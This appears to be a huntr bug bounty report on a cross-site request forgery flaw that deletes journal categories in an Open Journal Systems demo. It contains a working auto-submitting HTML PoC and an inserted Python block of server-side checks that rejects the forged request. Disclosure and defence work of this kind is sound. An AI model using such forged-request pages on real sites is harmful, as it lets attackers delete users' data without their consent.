huntr Hainguyen0207 A965AA16-79CE-4185-8F58-3D3B0D74A71E
History: Sep 28, 2023 - 4:14 p.m.

CSRF Delete Categories

2023-09-28 16:14:43
hainguyen0207
www.huntr.dev
csrf attack
fake requests
delete categories
unwanted
bug bounty

AI Score: 7.1 High (Confidence: Low)

EPSS: 0.001 Low (Percentile: 24.3%)

Description

CSRF Delete Categories

Proof of Concept

1. Attacker sends fake requests to users

  <html>
  <body>
    <form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/grid/settings/category/category-category-grid/delete-category">
      <input type="hidden" name="categoryId" value="6" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
  </html>

2. User clicks, and categories are deleted without the user wanting it
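
A server-side check that would refuse the forged request above, as an added example (not code from the report or from OJS). The origin `https://journal.example`, the `csrfToken` parameter name and all function names are assumptions made for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the application's own origin (placeholder value).
TRUSTED_ORIGIN = "https://journal.example"

def new_csrf_token() -> str:
    """Per-session random token, kept server-side and embedded in real forms."""
    return secrets.token_hex(32)

def same_origin(header_value: str) -> bool:
    """Compare scheme and host[:port] of an Origin/Referer header with ours."""
    got, want = urlsplit(header_value), urlsplit(TRUSTED_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)

def check_delete_request(method, headers, params, session_token):
    """Return (allowed, reason) for a state-changing delete-category request."""
    # 1. Deletions must not be reachable with GET; the PoC form has no
    #    method attribute, so the browser submits it as GET.
    if method.upper() != "POST":
        return False, "method not allowed"
    # 2. A request started by another site carries that site's Origin/Referer.
    source = headers.get("Origin") or headers.get("Referer") or ""
    if not same_origin(source):
        return False, "cross-origin request"
    # 3. A foreign page cannot read the session's token, so it cannot send it.
    sent = params.get("csrfToken", "")
    if not session_token or not hmac.compare_digest(
            sent.encode(), session_token.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"

def demo():
    token = new_csrf_token()
    # Constructed requests: the first mirrors what the PoC form produces.
    forged = check_delete_request(
        "GET", {"Referer": "https://attacker.example/"}, {"categoryId": "6"}, token)
    forged_post = check_delete_request(
        "POST", {"Origin": "https://attacker.example"}, {"categoryId": "6"}, token)
    genuine = check_delete_request(
        "POST", {"Origin": TRUSTED_ORIGIN},
        {"categoryId": "6", "csrfToken": token}, token)
    return forged, forged_post, genuine

if __name__ == "__main__":
    for result in demo():
        print(result)
```

Each of the three checks rejects the PoC request on its own; keeping all of them means a gap in one (for example a stripped Referer header) does not reopen the hole.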

Payload PoC

https://drive.google.com/file/d/12cCzI-_b9KLCRlND6MmjM6j-DJfTJiIt/view?usp=sharing

Video PoC

https://drive.google.com/file/d/1y-cR_Stxg9hvk7kZp9HeObLPxQDXbpMW/view?usp=sharing
